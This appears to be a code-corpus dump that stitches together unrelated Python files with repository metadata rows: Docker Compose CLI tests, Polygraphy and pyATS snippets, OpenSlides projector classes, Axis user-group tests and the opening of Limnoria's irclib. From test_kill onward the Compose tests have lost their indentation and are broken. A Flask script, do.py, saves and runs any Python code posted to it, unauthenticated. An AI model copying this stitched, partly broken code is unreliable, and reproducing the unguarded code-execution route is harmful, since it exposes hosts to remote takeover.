        self.command = TopLevelCommand()
        self.command.base_dir = 'tests/fixtures/simple-composefile'
    def tearDown(self):
        """Restore sys.exit and clean up any containers the test started."""
        sys.exit = self.old_sys_exit
        self.project.kill()
        self.project.remove_stopped()
    @property
    def project(self):
        """The Compose project for the current base_dir (or the override
        stored in self._project)."""
        # Hack: allow project to be overridden. This needs refactoring so that
        # the project object is built exactly once, by the command object, and
        # accessed by the test case object.
        if hasattr(self, '_project'):
            return self._project
        return self.command.get_project(self.command.get_config_path())
    def test_help(self):
        """`help up` exits via SystemExit carrying the usage text."""
        old_base_dir = self.command.base_dir
        self.command.base_dir = 'tests/fixtures/no-composefile'
        with self.assertRaises(SystemExit) as exc_context:
            self.command.dispatch(['help', 'up'], None)
        self.assertIn('Usage: up [options] [SERVICE...]', str(exc_context.exception))
        # self.project.kill() fails during teardown
        # unless there is a composefile.
        self.command.base_dir = old_base_dir
    # TODO: address the "Inappropriate ioctl for device" warnings in test output
    @patch('sys.stdout', new_callable=StringIO)
    def test_ps(self, mock_stdout):
        """`ps` lists the project's containers by name."""
        self.project.get_service('simple').create_container()
        self.command.dispatch(['ps'], None)
        self.assertIn('simplecomposefile_simple_1', mock_stdout.getvalue())
    @patch('sys.stdout', new_callable=StringIO)
    def test_ps_default_composefile(self, mock_stdout):
        """`ps` only shows services from the default compose file."""
        self.command.base_dir = 'tests/fixtures/multiple-composefiles'
        self.command.dispatch(['up', '-d'], None)
        self.command.dispatch(['ps'], None)
        output = mock_stdout.getvalue()
        self.assertIn('multiplecomposefiles_simple_1', output)
        self.assertIn('multiplecomposefiles_another_1', output)
        self.assertNotIn('multiplecomposefiles_yetanother_1', output)
    @patch('sys.stdout', new_callable=StringIO)
    def test_ps_alternate_composefile(self, mock_stdout):
        """`-f` switches both up and ps to the alternate compose file."""
        self.command.base_dir = 'tests/fixtures/multiple-composefiles'
        self.command.dispatch(['-f', 'compose2.yml', 'up', '-d'], None)
        self.command.dispatch(['-f', 'compose2.yml', 'ps'], None)
        output = mock_stdout.getvalue()
        self.assertNotIn('multiplecomposefiles_simple_1', output)
        self.assertNotIn('multiplecomposefiles_another_1', output)
        self.assertIn('multiplecomposefiles_yetanother_1', output)
    @patch('compose.service.log')
    def test_pull(self, mock_logging):
        """`pull` logs a pull message per service."""
        self.command.dispatch(['pull'], None)
        mock_logging.info.assert_any_call('Pulling simple (busybox:latest)...')
        mock_logging.info.assert_any_call('Pulling another (busybox:latest)...')
    @patch('sys.stdout', new_callable=StringIO)
    def test_build_no_cache(self, mock_stdout):
        """A second `build` uses the cache unless --no-cache is given."""
        self.command.base_dir = 'tests/fixtures/simple-dockerfile'
        self.command.dispatch(['build', 'simple'], None)
        mock_stdout.truncate(0)
        cache_indicator = 'Using cache'
        self.command.dispatch(['build', 'simple'], None)
        output = mock_stdout.getvalue()
        self.assertIn(cache_indicator, output)
        mock_stdout.truncate(0)
        self.command.dispatch(['build', '--no-cache', 'simple'], None)
        output = mock_stdout.getvalue()
        self.assertNotIn(cache_indicator, output)
    def test_up(self):
        """`up -d` starts one detached container per service."""
        self.command.dispatch(['up', '-d'], None)
        service = self.project.get_service('simple')
        another = self.project.get_service('another')
        self.assertEqual(len(service.containers()), 1)
        self.assertEqual(len(another.containers()), 1)
        # Ensure containers don't have stdin and stdout connected in -d mode
        config = service.containers()[0].inspect()['Config']
        self.assertFalse(config['AttachStderr'])
        self.assertFalse(config['AttachStdout'])
        self.assertFalse(config['AttachStdin'])
    def test_up_with_links(self):
        """`up web` also starts the linked db, but not unrelated services."""
        self.command.base_dir = 'tests/fixtures/links-composefile'
        self.command.dispatch(['up', '-d', 'web'], None)
        web = self.project.get_service('web')
        db = self.project.get_service('db')
        console = self.project.get_service('console')
        self.assertEqual(len(web.containers()), 1)
        self.assertEqual(len(db.containers()), 1)
        self.assertEqual(len(console.containers()), 0)
    def test_up_with_no_deps(self):
        """`up --no-deps web` leaves linked services unstarted."""
        self.command.base_dir = 'tests/fixtures/links-composefile'
        self.command.dispatch(['up', '-d', '--no-deps', 'web'], None)
        web = self.project.get_service('web')
        db = self.project.get_service('db')
        console = self.project.get_service('console')
        self.assertEqual(len(web.containers()), 1)
        self.assertEqual(len(db.containers()), 0)
        self.assertEqual(len(console.containers()), 0)
    def test_up_with_recreate(self):
        """Re-running `up -d` recreates containers (new IDs)."""
        self.command.dispatch(['up', '-d'], None)
        service = self.project.get_service('simple')
        self.assertEqual(len(service.containers()), 1)
        old_ids = [c.id for c in service.containers()]
        self.command.dispatch(['up', '-d'], None)
        self.assertEqual(len(service.containers()), 1)
        new_ids = [c.id for c in service.containers()]
        self.assertNotEqual(old_ids, new_ids)
    def test_up_with_keep_old(self):
        """`up --no-recreate` keeps the existing containers (same IDs)."""
        self.command.dispatch(['up', '-d'], None)
        service = self.project.get_service('simple')
        self.assertEqual(len(service.containers()), 1)
        old_ids = [c.id for c in service.containers()]
        self.command.dispatch(['up', '-d', '--no-recreate'], None)
        self.assertEqual(len(service.containers()), 1)
        new_ids = [c.id for c in service.containers()]
        self.assertEqual(old_ids, new_ids)
    @patch('dockerpty.start')
    def test_run_service_without_links(self, mock_stdout):
        """`run` creates a one-off container with stdio attached."""
        self.command.base_dir = 'tests/fixtures/links-composefile'
        self.command.dispatch(['run', 'console', '/bin/true'], None)
        self.assertEqual(len(self.project.containers()), 0)
        # Ensure stdin/out was open
        container = self.project.containers(stopped=True, one_off=True)[0]
        config = container.inspect()['Config']
        self.assertTrue(config['AttachStderr'])
        self.assertTrue(config['AttachStdout'])
        self.assertTrue(config['AttachStdin'])
    @patch('dockerpty.start')
    def test_run_service_with_links(self, __):
        """`run web` starts linked services but not unrelated ones."""
        self.command.base_dir = 'tests/fixtures/links-composefile'
        self.command.dispatch(['run', 'web', '/bin/true'], None)
        db = self.project.get_service('db')
        console = self.project.get_service('console')
        self.assertEqual(len(db.containers()), 1)
        self.assertEqual(len(console.containers()), 0)
    @patch('dockerpty.start')
    def test_run_with_no_deps(self, __):
        """`run --no-deps` skips linked services."""
        self.command.base_dir = 'tests/fixtures/links-composefile'
        self.command.dispatch(['run', '--no-deps', 'web', '/bin/true'], None)
        db = self.project.get_service('db')
        self.assertEqual(len(db.containers()), 0)
    @patch('dockerpty.start')
    def test_run_does_not_recreate_linked_containers(self, __):
        """`run` reuses already-running linked containers (same IDs)."""
        self.command.base_dir = 'tests/fixtures/links-composefile'
        self.command.dispatch(['up', '-d', 'db'], None)
        db = self.project.get_service('db')
        self.assertEqual(len(db.containers()), 1)
        old_ids = [c.id for c in db.containers()]
        self.command.dispatch(['run', 'web', '/bin/true'], None)
        self.assertEqual(len(db.containers()), 1)
        new_ids = [c.id for c in db.containers()]
        self.assertEqual(old_ids, new_ids)
    @patch('dockerpty.start')
    def test_run_without_command(self, __):
        """`run` without a command uses the service/image default command."""
        self.command.base_dir = 'tests/fixtures/commands-composefile'
        self.check_build('tests/fixtures/simple-dockerfile', tag='composetest_test')
        for c in self.project.containers(stopped=True, one_off=True):
            c.remove()
        self.command.dispatch(['run', 'implicit'], None)
        service = self.project.get_service('implicit')
        containers = service.containers(stopped=True, one_off=True)
        self.assertEqual(
            [c.human_readable_command for c in containers],
            [u'/bin/sh -c echo "success"'],
        )
        self.command.dispatch(['run', 'explicit'], None)
        service = self.project.get_service('explicit')
        containers = service.containers(stopped=True, one_off=True)
        self.assertEqual(
            [c.human_readable_command for c in containers],
            [u'/bin/true'],
        )
    @patch('dockerpty.start')
    def test_run_service_with_entrypoint_overridden(self, _):
        """`run --entrypoint` replaces the image entrypoint."""
        self.command.base_dir = 'tests/fixtures/dockerfile_with_entrypoint'
        name = 'service'
        self.command.dispatch(
            ['run', '--entrypoint', '/bin/echo', name, 'helloworld'],
            None
        )
        service = self.project.get_service(name)
        container = service.containers(stopped=True, one_off=True)[0]
        self.assertEqual(
            container.human_readable_command,
            u'/bin/echo helloworld'
        )
    @patch('dockerpty.start')
    def test_run_service_with_user_overridden(self, _):
        """`run --user=NAME` sets the container user."""
        self.command.base_dir = 'tests/fixtures/user-composefile'
        name = 'service'
        user = 'sshd'
        args = ['run', '--user={}'.format(user), name]
        self.command.dispatch(args, None)
        service = self.project.get_service(name)
        container = service.containers(stopped=True, one_off=True)[0]
        self.assertEqual(user, container.get('Config.User'))
    @patch('dockerpty.start')
    def test_run_service_with_user_overridden_short_form(self, _):
        """`run -u NAME` is equivalent to --user."""
        self.command.base_dir = 'tests/fixtures/user-composefile'
        name = 'service'
        user = 'sshd'
        args = ['run', '-u', user, name]
        self.command.dispatch(args, None)
        service = self.project.get_service(name)
        container = service.containers(stopped=True, one_off=True)[0]
        self.assertEqual(user, container.get('Config.User'))
    @patch('dockerpty.start')
    def test_run_service_with_environement_overridden(self, _):
        """`run -e` overrides, adds to and merges with the yaml environment."""
        name = 'service'
        self.command.base_dir = 'tests/fixtures/environment-composefile'
        self.command.dispatch(
            ['run', '-e', 'foo=notbar', '-e', 'allo=moto=bobo',
             '-e', 'alpha=beta', name],
            None
        )
        service = self.project.get_service(name)
        container = service.containers(stopped=True, one_off=True)[0]
        # env overriden
        self.assertEqual('notbar', container.environment['foo'])
        # keep environement from yaml
        self.assertEqual('world', container.environment['hello'])
        # added option from command line
        self.assertEqual('beta', container.environment['alpha'])
        # make sure a value with a = don't crash out
        self.assertEqual('moto=bobo', container.environment['allo'])
    @patch('dockerpty.start')
    def test_run_service_without_map_ports(self, __):
        """`run` does not publish the service's ports by default."""
        # create one off container
        self.command.base_dir = 'tests/fixtures/ports-composefile'
        self.command.dispatch(['run', '-d', 'simple'], None)
        container = self.project.get_service('simple').containers(one_off=True)[0]
        # get port information
        port_random = container.get_local_port(3000)
        port_assigned = container.get_local_port(3001)
        # close all one off containers we just created
        container.stop()
        # check the ports
        self.assertEqual(port_random, None)
        self.assertEqual(port_assigned, None)
    @patch('dockerpty.start')
    def test_run_service_with_map_ports(self, __):
        """`run --service-ports` publishes the service's ports."""
        # create one off container
        self.command.base_dir = 'tests/fixtures/ports-composefile'
        self.command.dispatch(['run', '-d', '--service-ports', 'simple'], None)
        container = self.project.get_service('simple').containers(one_off=True)[0]
        # get port information
        port_random = container.get_local_port(3000)
        port_assigned = container.get_local_port(3001)
        # close all one off containers we just created
        container.stop()
        # check the ports
        self.assertNotEqual(port_random, None)
        self.assertIn("0.0.0.0", port_random)
        self.assertEqual(port_assigned, "0.0.0.0:49152")
    def test_rm(self):
        """`rm --force` / `rm -f` remove stopped containers."""
        service = self.project.get_service('simple')
        service.create_container()
        service.kill()
        self.assertEqual(len(service.containers(stopped=True)), 1)
        self.command.dispatch(['rm', '--force'], None)
        self.assertEqual(len(service.containers(stopped=True)), 0)
        service = self.project.get_service('simple')
        service.create_container()
        service.kill()
        self.assertEqual(len(service.containers(stopped=True)), 1)
        self.command.dispatch(['rm', '-f'], None)
        self.assertEqual(len(service.containers(stopped=True)), 0)
def test_kill(self):
self.command.dispatch(['up', '-d'], None)
service = self.project.get_service('simple')
self.assertEqual(len(service.containers()), 1)
self.assertTrue(service.containers()[0].is_running)
self.command.dispatch(['kill'], None)
self.assertEqual(len(service.containers(stopped=True)), 1)
self.assertFalse(service.containers(stopped=True)[0].is_running)
def test_kill_signal_sigint(self):
self.command.dispatch(['up', '-d'], None)
service = self.project.get_service('simple')
self.assertEqual(len(service.containers()), 1)
self.assertTrue(service.containers()[0].is_running)
self.command.dispatch(['kill', '-s', 'SIGINT'], None)
self.assertEqual(len(service.containers()), 1)
# The container is still running. It has been only interrupted
self.assertTrue(service.containers()[0].is_running)
def test_kill_interrupted_service(self):
self.command.dispatch(['up', '-d'], None)
service = self.project.get_service('simple')
self.command.dispatch(['kill', '-s', 'SIGINT'], None)
self.assertTrue(service.containers()[0].is_running)
self.command.dispatch(['kill', '-s', 'SIGKILL'], None)
self.assertEqual(len(service.containers(stopped=True)), 1)
self.assertFalse(service.containers(stopped=True)[0].is_running)
def test_restart(self):
service = self.project.get_service('simple')
container = service.create_container()
service.start_container(container)
started_at = container.dictionary['State']['StartedAt']
self.command.dispatch(['restart'], None)
container.inspect()
self.assertNotEqual(
container.dictionary['State']['FinishedAt'],
'0001-01-01T00:00:00Z',
)
self.assertNotEqual(
container.dictionary['State']['StartedAt'],
started_at,
)
def test_scale(self):
project = self.project
self.command.scale(project, {'SERVICE=NUM': ['simple=1']})
self.assertEqual(len(project.get_service('simple').containers()), 1)
self.command.scale(project, {'SERVICE=NUM': ['simple=3', 'another=2']})
self.assertEqual(len(project.get_service('simple').containers()), 3)
self.assertEqual(len(project.get_service('another').containers()), 2)
self.command.scale(project, {'SERVICE=NUM': ['simple=1', 'another=1']})
self.assertEqual(len(project.get_service('simple').containers()), 1)
self.assertEqual(len(project.get_service('another').containers()), 1)
self.command.scale(project, {'SERVICE=NUM': ['simple=1', 'another=1']})
self.assertEqual(len(project.get_service('simple').containers()), 1)
self.assertEqual(len(project.get_service('another').containers()), 1)
self.command.scale(project, {'SERVICE=NUM': ['simple=0', 'another=0']})
self.assertEqual(len(project.get_service('simple').containers()), 0)
self.assertEqual(len(project.get_service('another').containers()), 0)
def test_port(self):
self.command.base_dir = 'tests/fixtures/ports-composefile'
self.command.dispatch(['up', '-d'], None)
container = self.project.get_service('simple').get_container()
@patch('sys.stdout', new_callable=StringIO)
def get_port(number, mock_stdout):
self.command.dispatch(['port', 'simple', str(number)], None)
return mock_stdout.getvalue().rstrip()
self.assertEqual(get_port(3000), container.get_local_port(3000))
self.assertEqual(get_port(3001), "0.0.0.0:49152")
self.assertEqual(get_port(3002), "")
def test_env_file_relative_to_compose_file(self):
config_path = os.path.abspath('tests/fixtures/env-file/docker-compose.yml')
self.command.dispatch(['-f', config_path, 'up', '-d'], None)
self._project = self.command.get_project(config_path)
containers = self.project.containers(stopped=True)
self.assertEqual(len(containers), 1)
self.assertIn("FOO=1", containers[0].get('Config.Env'))
def test_up_with_extends(self):
self.command.base_dir = 'tests/fixtures/extends'
self.command.dispatch(['up', '-d'], None)
self.assertEqual(
set([s.name for s in self.project.services]),
set(['mydb', 'myweb']),
)
# Sort by name so we get [db, web]
containers = sorted(
self.project.containers(stopped=True),
key=lambda c: c.name,
)
self.assertEqual(len(containers), 2)
web = containers[1]
self.assertEqual(set(web.links()), set(['db', 'mydb_1', 'extends_mydb_1']))
expected_env = set([
"FOO=1",
"BAR=2",
"BAZ=2",
])
self.assertTrue(expected_env <= set(web.get('Config.Env')))
| 40.431072 | 89 | 0.642853 |
4c1f6dee7985283c9f33e58bdad5f5da63dda60c | 111 | py | Python | tools/Polygraphy/polygraphy/backend/base/__init__.py | martellz/TensorRT | f182e83b30b5d45aaa3f9a041ff8b3ce83e366f4 | [
"Apache-2.0"
] | 4 | 2021-04-16T13:49:38.000Z | 2022-01-16T08:58:07.000Z | tools/Polygraphy/polygraphy/backend/base/__init__.py | martellz/TensorRT | f182e83b30b5d45aaa3f9a041ff8b3ce83e366f4 | [
"Apache-2.0"
] | null | null | null | tools/Polygraphy/polygraphy/backend/base/__init__.py | martellz/TensorRT | f182e83b30b5d45aaa3f9a041ff8b3ce83e366f4 | [
"Apache-2.0"
] | 2 | 2021-02-04T14:46:10.000Z | 2021-02-04T14:56:08.000Z | from polygraphy.backend.base.loader import BaseLoadModel
from polygraphy.backend.base.runner import BaseRunner
| 37 | 56 | 0.873874 |
eb093ca0353c2f7c2aa942dfbc51dbfc8746228c | 215 | py | Python | PyATS/ex5_vlans/job1.py | dmmar/netascode | 1d15e717b600d38bd33a65fa110e1c129d72e5df | [
"MIT"
] | 36 | 2019-07-17T17:00:32.000Z | 2022-03-26T09:34:40.000Z | PyATS/ex5_vlans/job1.py | dmmar/netascode | 1d15e717b600d38bd33a65fa110e1c129d72e5df | [
"MIT"
] | 4 | 2021-03-31T19:16:53.000Z | 2021-12-13T20:01:57.000Z | PyATS/ex5_vlans/job1.py | dmmar/netascode | 1d15e717b600d38bd33a65fa110e1c129d72e5df | [
"MIT"
] | 10 | 2019-07-31T07:58:03.000Z | 2021-10-13T04:45:45.000Z | # Example: job1.py
# -------------------
#
# a simple job file for the script above
from pyats.easypy import run
def main():
# run api launches a testscript as an individual task.
run('vlans_check.py')
| 17.916667 | 58 | 0.623256 |
b32b9395a0d1e5ddcfefcf27115d6895dd742dde | 2,120 | py | Python | do.py | JackLuSun/Financial-services-calculation | 92ba3c6fd7ced7df1e80b34083eef7f7d95a0a6d | [
"MIT"
] | null | null | null | do.py | JackLuSun/Financial-services-calculation | 92ba3c6fd7ced7df1e80b34083eef7f7d95a0a6d | [
"MIT"
] | null | null | null | do.py | JackLuSun/Financial-services-calculation | 92ba3c6fd7ced7df1e80b34083eef7f7d95a0a6d | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Sat Nov 2 23:50:01 2019
@author: jackl
GOAL: ๅผๅไธไธช็ฎ้็pythonๅจ็บฟ่ฟ่ก็ฝ็ซ๏ผๅๅฉ python ๅ็ซฏๆกๆถflask ๅฟซ้ๅฎ็ฐๅ็ซฏ็็ฎ่ฆๅผๅ
"""
from flask import Flask, request
import graphviz
import subprocess
app = Flask(__name__)
@app.route('/',methods=['GET'])# tell flask realation between URL and function who deals with the URL
def hello_world():
r=""
with open('index.html',encoding="utf8") as f:
r = f.read()
return r
def textPreprocess():
'''
ๅฏนๅๅง็ input.txt ๆไปถ่ฟ่กๆ ผๅผๅ๏ผ็ๆ็ฌฆๅ่ง่็ dot ๆบ็
'''
with open('input.txt') as f:# ๅฏน input.txt ่ฟ่กๆ ผๅผๅ๏ผไฝฟไน็ฌฆๅ graphviz ็ๅพๆ ผๅผ
lines = f.readlines()
graph = "digraph {\n"
r = [0]*2
for line in lines:
print(line)
pos = line.index(',')
line = line.strip()
r[0] = line[0:pos]
r[1] = line[pos+1:]
if '->' in r[0]: graph+=r[0]+' '+'[label = '+r[1]+"]\n"
else: graph+=r[0]+' '+'[label = '+r[1]+']\n'
graph+="}"
with open("graph.gv","w",encoding="utf8") as out: # ๅฐๆ ผๅผๅๅฎๆฏ็ๅพๆ ผๅผๆฐๆฎไฟๅญๅฐ graph ๆไปถไธญ
out.write(graph)
return
@app.route('/post_test',methods=['POST','GET'])# ๅ็ซฏๅๅ็ซฏๅ้่ฆๆง่ก็ๆบไปฃ็ ๆถ๏ผURLไธบ post_test ๅฏนๅบ็ๅ็ซฏ post ๆถๅๆๅฎ็ url
def get_tasks():
if request.method == 'POST':
code = request.get_json(force=True)['code']# ๅ็ซฏ้ฃ่พน้็จjson ๆ ผๅผ,ๅ็ซฏ็ฉฟ่ฟๆฅ็ๆฐๆฎๆๅฎๆพๅจไบ 'code' ๅ
ณ้ฎๅญๅฏนๅบ็ๅผ้
# ๅฐๅ็ซฏไผ ๆฅ็python ็จๅบไฟๅญๅนถๆง่ก
with open('code.py','w',encoding='utf8') as f:
f.write(code)
# ่ฟ่กๆต่งๅจๅๆฅ็ python ็จๅบ
# ่ฟไธช็จๅบๅบ่ฏฅ็ๆไธไธช input.txt ๆไปถ
subprocess.Popen(['python', 'code.py'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
textPreprocess()# ๅฏน่พๅ
ฅๆๆฌ่ฟ่กๅค็ ,ๅ
้จๆๅฎไบๅฏน input.txt ๆไปถ่ฟ่กๅค็
graph = graphviz.Source.from_file("graph.gv")# graph.gv ๅจๅฝๆฐ textPreproces ไธญไบง็๏ผๅฎๆฏไธไธช dot ๆบ็
graph.format = 'svg'
svg = graph.pipe().decode('utf-8')# ้่ฟ็ฎก้๏ผ็ดๆฅๅพๅฐ graph ่ฟไธช dot ๅฏน่ฑก็ svg ๆบ็
return svg # ๅฐๅพๆฐๆฎ่ฟๅ็ปๅ็ซฏ
return hello_world()
if __name__ == '__main__':
app.run(host='localhost',port='2333')
| 30.285714 | 101 | 0.574057 |
855d2767d9e57c56c6c31757e857f9c334aa5e40 | 3,421 | py | Python | openslides/utils/projector.py | rolandgeider/OpenSlides | 331141c17cb23da26e377d4285efdb4a50753a59 | [
"MIT"
] | null | null | null | openslides/utils/projector.py | rolandgeider/OpenSlides | 331141c17cb23da26e377d4285efdb4a50753a59 | [
"MIT"
] | null | null | null | openslides/utils/projector.py | rolandgeider/OpenSlides | 331141c17cb23da26e377d4285efdb4a50753a59 | [
"MIT"
] | null | null | null | from django.dispatch import Signal
from .dispatch import SignalConnectMetaClass
class ProjectorElement(object, metaclass=SignalConnectMetaClass):
"""
Base class for an element on the projector.
Every app which wants to add projector elements has to create classes
subclassing from this base class with different names. The name attribute
has to be set. The metaclass (SignalConnectMetaClass) does the rest of the
magic.
"""
signal = Signal()
name = None
def __init__(self, **kwargs):
"""
Initializes the projector element instance. This is done when the
signal is sent.
Because of Django's signal API, we have to take wildcard keyword
arguments. But they are not used here.
"""
pass
@classmethod
def get_dispatch_uid(cls):
"""
Returns the classname as a unique string for each class. Returns None
for the base class so it will not be connected to the signal.
"""
if not cls.__name__ == 'ProjectorElement':
return cls.__name__
def check_and_update_data(self, projector_object, config_entry):
"""
Checks projector element data via self.check_data() and updates
them via self.update_data(). The projector object and the config
entry have to be given.
"""
self.projector_object = projector_object
self.config_entry = config_entry
assert self.config_entry.get('name') == self.name, (
'To get data of a projector element, the correct config entry has to be given.')
self.check_data()
return self.update_data() or {}
def check_data(self):
"""
Method can be overridden to validate projector element data. This
may raise ProjectorException in case of an error.
Default: Does nothing.
"""
pass
def update_data(self):
"""
Method can be overridden to update the projector element data
output. This should return a dictonary. Use this for server
calculated data which have to be forwared to the client.
Default: Does nothing.
"""
pass
def get_requirements(self, config_entry):
"""
Returns an iterable of ProjectorRequirement instances to setup
which views should be accessable for projector clients if the
projector element is active. The config_entry has to be given.
"""
return ()
class ProjectorRequirement:
"""
Container for required views. Such a view is defined by its class, its
action and its kwargs which come from the URL path.
"""
def __init__(self, view_class, view_action, **kwargs):
self.view_class = view_class
self.view_action = view_action
self.kwargs = kwargs
def is_currently_required(self, view_instance):
"""
Returns True if the view_instance matches the initiated data of this
requirement.
"""
if not type(view_instance) == self.view_class:
result = False
elif not view_instance.action == self.view_action:
result = False
else:
result = True
for key in view_instance.kwargs:
if not self.kwargs[key] == view_instance.kwargs[key]:
result = False
break
return result
| 32.894231 | 92 | 0.635779 |
9ecf35fbe2b3c3e16fd6b1a23057f74f226a15b2 | 2,713 | py | Python | tests/test_user_groups.py | drewclauson/axis | be4be74a0242e499cd10a8a9b96c9ec76fa04f88 | [
"MIT"
] | 16 | 2018-05-29T20:07:04.000Z | 2022-01-27T14:15:16.000Z | tests/test_user_groups.py | Kane610/axis | 240c42f7cbad2358f0463d5234a82678532f9549 | [
"MIT"
] | 27 | 2017-11-05T12:14:17.000Z | 2022-02-07T08:07:48.000Z | tests/test_user_groups.py | drewclauson/axis | be4be74a0242e499cd10a8a9b96c9ec76fa04f88 | [
"MIT"
] | 6 | 2019-10-03T07:59:49.000Z | 2021-07-18T16:57:28.000Z | """Test Axis user groups API.
pytest --cov-report term-missing --cov=axis.user_groups tests/test_user_groups.py
"""
import pytest
import respx
from axis.user_groups import URL, UserGroups
from .conftest import HOST
@pytest.fixture
def user_groups(axis_device) -> UserGroups:
"""Returns the user_groups mock object."""
return UserGroups("", axis_device.vapix.request)
@respx.mock
@pytest.mark.asyncio
async def test_empty_response(user_groups):
"""Test get_supported_versions"""
respx.get(f"http://{HOST}:80{URL}").respond(
text="",
headers={"Content-Type": "text/plain"},
)
await user_groups.update()
assert user_groups.privileges == "unknown"
assert not user_groups.admin
assert not user_groups.operator
assert not user_groups.viewer
assert not user_groups.ptz
@respx.mock
@pytest.mark.asyncio
async def test_root_user(user_groups):
"""Test get_supported_versions"""
respx.get(f"http://{HOST}:80{URL}").respond(
text="root\nroot admin operator ptz viewer\n",
headers={"Content-Type": "text/plain"},
)
await user_groups.update()
assert user_groups.privileges == "admin"
assert user_groups.admin
assert user_groups.operator
assert user_groups.viewer
assert user_groups.ptz
@respx.mock
@pytest.mark.asyncio
async def test_admin_user(user_groups):
"""Test get_supported_versions"""
respx.get(f"http://{HOST}:80{URL}").respond(
text="administrator\nusers admin operator ptz viewer\n",
headers={"Content-Type": "text/plain"},
)
await user_groups.update()
assert user_groups.privileges == "admin"
assert user_groups.admin
assert user_groups.operator
assert user_groups.viewer
assert user_groups.ptz
@respx.mock
@pytest.mark.asyncio
async def test_operator_user(user_groups):
"""Test get_supported_versions"""
respx.get(f"http://{HOST}:80{URL}").respond(
text="operator\nusers operator viewer\n",
headers={"Content-Type": "text/plain"},
)
await user_groups.update()
assert user_groups.privileges == "operator"
assert not user_groups.admin
assert user_groups.operator
assert user_groups.viewer
assert not user_groups.ptz
@respx.mock
@pytest.mark.asyncio
async def test_viewer_user(user_groups):
"""Test get_supported_versions"""
respx.get(f"http://{HOST}:80{URL}").respond(
text="viewer\nusers viewer\n",
headers={"Content-Type": "text/plain"},
)
await user_groups.update()
assert user_groups.privileges == "viewer"
assert not user_groups.admin
assert not user_groups.operator
assert user_groups.viewer
assert not user_groups.ptz
| 25.838095 | 81 | 0.7007 |
eb5923aaf391d0a6b666a746de79e2411d43d7ad | 56,426 | py | Python | src/irclib.py | ProgVal/Limnoria-test | 05179cec2f2548f1d48a8e9049e88634f7a68fbd | [
"BSD-3-Clause"
] | null | null | null | src/irclib.py | ProgVal/Limnoria-test | 05179cec2f2548f1d48a8e9049e88634f7a68fbd | [
"BSD-3-Clause"
] | null | null | null | src/irclib.py | ProgVal/Limnoria-test | 05179cec2f2548f1d48a8e9049e88634f7a68fbd | [
"BSD-3-Clause"
] | null | null | null | ###
# Copyright (c) 2002-2005 Jeremiah Fincher
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
import re
import copy
import time
import random
import base64
import collections
try:
from ecdsa import SigningKey, BadDigestError
ecdsa = True
except ImportError:
ecdsa = False
from . import conf, ircdb, ircmsgs, ircutils, log, utils, world
from .utils.str import rsplit
from .utils.iter import chain
from .utils.structures import smallqueue, RingBuffer
###
# The base class for a callback to be registered with an Irc object. Shows
# the required interface for callbacks -- name(),
# inFilter(irc, msg), outFilter(irc, msg), and __call__(irc, msg) [used so as
# to make functions used as callbacks conceivable, and so if refactoring ever
# changes the nature of the callbacks from classes to functions, syntactical
# changes elsewhere won't be required.]
###
class IrcCommandDispatcher(object):
    """Mixin that routes IRC commands to ``doCommand`` handler methods."""
    def dispatchCommand(self, command):
        """Return the handler method for *command*, or None if there is none.

        The lookup is ``do`` + the capitalized command, e.g. ``privmsg``
        (or ``PRIVMSG``) resolves to ``self.doPrivmsg``.
        """
        handler_name = 'do%s' % command.capitalize()
        return getattr(self, handler_name, None)
class IrcCallback(IrcCommandDispatcher, log.Firewalled):
    """Base class for standard callbacks.
    Callbacks derived from this class should have methods of the form
    "doCommand" -- doPrivmsg, doNick, do433, etc.  These will be called
    on matching messages.
    """
    # Names of callbacks that must be called after/before this one;
    # consumed by callPrecedence() below.
    callAfter = ()
    callBefore = ()
    # Mapping of method name -> fallback value/callable, consumed by the
    # log.Firewalled base so exceptions raised in these methods are logged
    # rather than propagated.  NOTE(review): exact semantics live in
    # log.Firewalled (not visible here) -- confirm there.
    __firewalled__ = {'die': None,
                      'reset': None,
                      '__call__': None,
                      'inFilter': lambda self, irc, msg: msg,
                      'outFilter': lambda self, irc, msg: msg,
                      'name': lambda self: self.__class__.__name__,
                      'callPrecedence': lambda self, irc: ([], []),
                      }
    def __init__(self, *args, **kwargs):
        #object doesn't take any args, so the buck stops here.
        #super(IrcCallback, self).__init__(*args, **kwargs)
        pass
    def __repr__(self):
        return '<%s %s %s>' % \
               (self.__class__.__name__, self.name(), object.__repr__(self))
    def name(self):
        """Returns the name of the callback."""
        return self.__class__.__name__
    def callPrecedence(self, irc):
        """Returns a pair of (callbacks to call before me,
        callbacks to call after me)"""
        after = []
        before = []
        # Names in callBefore are callbacks this one runs *before*, so the
        # looked-up callbacks land in the 'after' list (and vice versa).
        # Names that are not currently loaded are silently skipped.
        for name in self.callBefore:
            cb = irc.getCallback(name)
            if cb is not None:
                after.append(cb)
        for name in self.callAfter:
            cb = irc.getCallback(name)
            if cb is not None:
                before.append(cb)
        assert self not in after, '%s was in its own after.' % self.name()
        assert self not in before, '%s was in its own before.' % self.name()
        return (before, after)
    def inFilter(self, irc, msg):
        """Used for filtering/modifying messages as they're entering.
